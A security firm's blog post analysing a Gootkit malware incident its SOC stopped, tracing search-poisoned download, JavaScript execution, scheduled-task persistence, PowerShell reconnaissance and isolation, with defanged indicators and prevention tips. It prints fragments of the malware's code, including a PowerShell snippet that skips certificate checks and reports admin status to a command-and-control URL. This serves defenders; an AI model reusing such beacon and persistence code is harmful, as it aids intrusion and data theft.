“We needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.”

IT Operations Manager
Simon Darley
Trusted by industry leaders

Let's Talk

Call us on one of the numbers below, we cover the whole of the UK.

BriSTOL HQ & The South West

+44 (0) 117 974 5179

London & Surrounding Areas

+44 (0) 207 043 7044

Manchester & the North West

+44 (0) 161 399 1305

“We needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.”

IT Operations Manager
Simon Darley
Trusted by industry leaders

Request a Call-back.

First we need a few details.

Contact Form Primary popup

Keep up to date with the experts

Get insights direct to your email inbox

NEWSLETTER - Exit Intent

Follow us on social

“We needed to find solutions to a variety of issues whilst being a complex business, operating in a 24/7 environment. Stripe OLT listened and understood immediately the challenges we faced.”

IT Operations Manager
Simon Darley
Trusted by industry leaders

Request a Call

First we need a few details.

Contact Form Primary popup
Expert Intel

Gootkit Malware Exploit

Published: March 4, 2024
Updated: March 07, 2024
Expert: Sam B
Role: SOC Lead
Specialises in: Cyber Security Operations
What you will learn:
Our SOC Lead, Sam B, takes you through our recent encounter with a GootKit exploit.
At its core, Gootkit is designed to steal sensitive information by injecting malicious code into web browsers, which then captures user input (like usernames, passwords, and other personal information) before it is encrypted and sent over the internet. Want to know more about this vulnerability? Keep reading…
At Stripe OLT, our analysts face new challenges every day, and occasionally, we come across something noteworthy…

Recently, at Stripe OLT, our team encountered a Gootkit malware exploit in one of our client’s systems. Gootkit, while not as widely recognised as some other malware families, has developed from a simple trojan into a complex tool that delivers various malicious payloads, exploits vulnerabilities, and gains unauthorised access to data.

The below process will walk you through our experience with this specific Gootkit exploit, from the initial detection to how we ultimately isolated the risk. It’s a straightforward look at how we handled this situation, in the hope that those reading can gain insight into the risks associated with downloaded ransomware.
The following is a walk-through of a genuine GootKit prevention event. A reconnaissance, persistence and ransomware deployment mechanism.

Incident Prevention Walkthrough

Using specific terminology as bait, a threat actor created a link between themselves and an end-user by exploiting a common document template. Using a legitimate WordPress site, the threat actor deployed a poisoned search engine link for a term related to that document template.
Diagram of Exploit Process – Click to Enlarge

Incident Walkthrough

We’ll explore the incident in a condensed step-by-step format to highlight the behaviours exhibited by Gootkit.

Enter our End User

Casually browsing Bing without a care in the world.
Seeing a hit for their search ‘international deposit netting agreements’ they clicked the link.
The user navigates to the domain and downloads a zipped file. The file name checks out and matches their search term.

File Created

A file is created and added to the downloads folder.

Potential Prevention

With adequate threat intelligence, and the right automated preventative controls, any further interaction or threat could have been mitigated.
Threat intelligence feeds
IP reputation Blocks
Domain reputation blocks
Automated blocking of WordPress sites
.zip extension download alerting/blocks

User File Execution

Opening the .ZIP file, our user runs the JavaScript contained.
international deposit netting agreement 8965.js

Javascript Execution

Triggering the JavaScript results in the execution of sequential actions designed to create persistence, perform reconnaissance, and pave the way for ransomware deployment.

Registry Value Set and modified.

C:\Windows\System32\ WScript.exe.FriendlyAppName
wscript.exe modifies a Registry Value and creates a scheduled task called ‘location selection’. This scheduled task utilised the executable ITERAT~.JS.
The script pauses execution on the host.
The script tries to retrieve the full name or path of the host application/environment.
Similar to the previous command, pulls the full path name for the script file.
Creates an instance of the shell application.
IShellDispatch6.ShellExecute(“cscript.exe”, “”ITERAT~1.JS””, “”C:\Users\User”, “oPEn”, “0”);
This line attempts to execute the shell command, trying to run the ITERAT~1.JS using ‘cscript.exe’.

Triggering Powershell scripts

Multiple unsigned and partially obfuscated PowerShell scripts trigger, performing system discovery and reconnaissance actions.
Extracts the ‘name’ object from the current pipeline. Used in conjunction with ‘get-process’ it would extract the name of each process.
The script block extracts the MainWindowTitle property of each process, which is the title of the main window associated with that process.
Links the ‘name’ and ‘MainWindowTitle’ properties for each process found.
{$_.FrEE -gT 50000}
Reviewing whether the infected device has access to a certain size of hard drive space free.
SELECT * FROM Win32_LogicalDisk WHERE DeviceId=’H:’
looks for a H: drive category to select.
Displays information regarding the current user, including group and privilege assignments
Once deployed, GootKit will perform situation awareness tasks to understand the environment. Looking for active processes, host information and disk space is essential reconnaissance before deploying ransomware into an environment.

More chances to prevent

With multiple PowerShell scripts running with standard user privileges, there are different preventative measures that could have been enforced to hinder the activity.
Prevent unsigned PowerShell scripts from running.
Prevent obfuscated scripts from running.
Prevent standard privilege user accounts from executing PowerShell scripts.
Audit and alert suspicious system discovery activities.
Threat intelligence feeds and blocks for file hashes and domains.
Suspicious Registry value change blocks/alerting.

Further System Discovery

The heavily obfuscated script performs further system discovery activities, including checking whether administrative privileges are present.
If the ‘$isLocalAdmin’ value is 1, it constructs a string ‘$u6’ with the value “ADA3EA8A0D”. Using GET and POST requests, the compromised endpoint used a HTTPS implant to communicate with their attacker-controlled command and control service.
())).IsInRole([Security.Principal.WindowsBuiltinRole]::(Administrator))) {
$isLocalAdmin = “1”
} else {
$isLocalAdmin = “0”

$splitString = ADA3EA8A0D;

$g8 = new-object ($w[30]);
function r3($a4) { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
$c9 = ($w[46]);
$r1 = 30000;
$c8 = (hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php);
$u6 = “ADA3EA8A0D=$($isLocalAdmin)”;
if ($g8.(Count) -ne 0) {
$u6 = “$u6!” + ($g8 -join “|”)

End user Behaviour Trigger

Our user logs off for the day, shutting down their device.
The next morning arrives, and our user opens their laptop to begin a busy day of work.
Fulfilling a pre-requisite for a scheduled task, Powershell attempts to communicate with remote hosts on multiple channels.

SOC Intervention

Fortunately, at this point, the SOC had been called in to intervene.
Our team was able to assess the indicators and behaviour shown and respond appropriately.
We implemented device isolation, entity blocks, and remediation steps to prevent there being any further exploration or exploitation of the environment. No successful lateral movement, credential access or file exfiltration occurred.
Typically, following the deployment of Gootkit on an endpoint device, the goal is to move laterally through the environment until the actor reaches the goal of an appropriate server with admin rights available to then deploy ransomware. Fortunately, during this event, this did not occur. Not a Goot day for the threat actor.
OC data from this event is below.
If you’re a security or IT practitioner, use these to harden your environment against this exploit!

Initial Redirect Domain

Compromised Domain

Downloaded .zip

Initial Java Script
international deposit netting agreement 37722.js

Scheduled Task Script
C:\Users\user@domain.com\AppData\Roaming\’discovered resource’

URLs / Domains
IP: 109[.]237[.]140[.]52 (IpV4):443, alfa3207[.]alfahosting-server[.]de
IP: 91[.]203[.]110[.]217 (IpV4):443, host217[.]checkdomain[.]de (videogamecast[.]de)
IP: 104[.]21[.]69[.]96 (IpV4):443, Cloudflare[.]com (freevpn[.]me)
IP: 172[.]67[.]206[.]248 (IpV4):443, Cloudflare[.]com
IP: 185[.]251[.]11[.]73 (IpV4):80, gmessaging[.]net
IP: 103[.]1[.]208[.]220 (IpV4):443, hl-lw10[.]viettelidc[.]com[.]vn
IP: 2[.]57[.]138[.]160 (IpV4):443, s35[.]zenbox[.]pl (znadplanszy[.]pl)
IP: 172[.]67[.]130[.]23 (IpV4):443, Cloudflare[.]com (sawahegy[.]com) IP: 104[.]21[.]7[.]97 (IpV4):443, Cloudflare[.]com
If you want to find out how our award-winning SOC team can help to secure your business get in touch, or, for more information into our managed security operations centre click here.

Our latest expert Intel

  • March 27, 2024
    Read full article
  • Gootkit
    March 7, 2024
    Read full article
  • February 5, 2024
    Read full article
  • Malvertising
    December 20, 2023
    Read full article
  • Microsoft Ignite
    January 19, 2024
    Read full article
  • keys
    January 19, 2024
    Read full article
  • December 19, 2023
    Read full article
  • CVE-2023-42439
    November 9, 2023
    Read full article
  • password
    September 11, 2023
    Read full article
  • November 24, 2023
    Read full article
  • August 1, 2023
    Read full article
  • July 27, 2023
    Read full article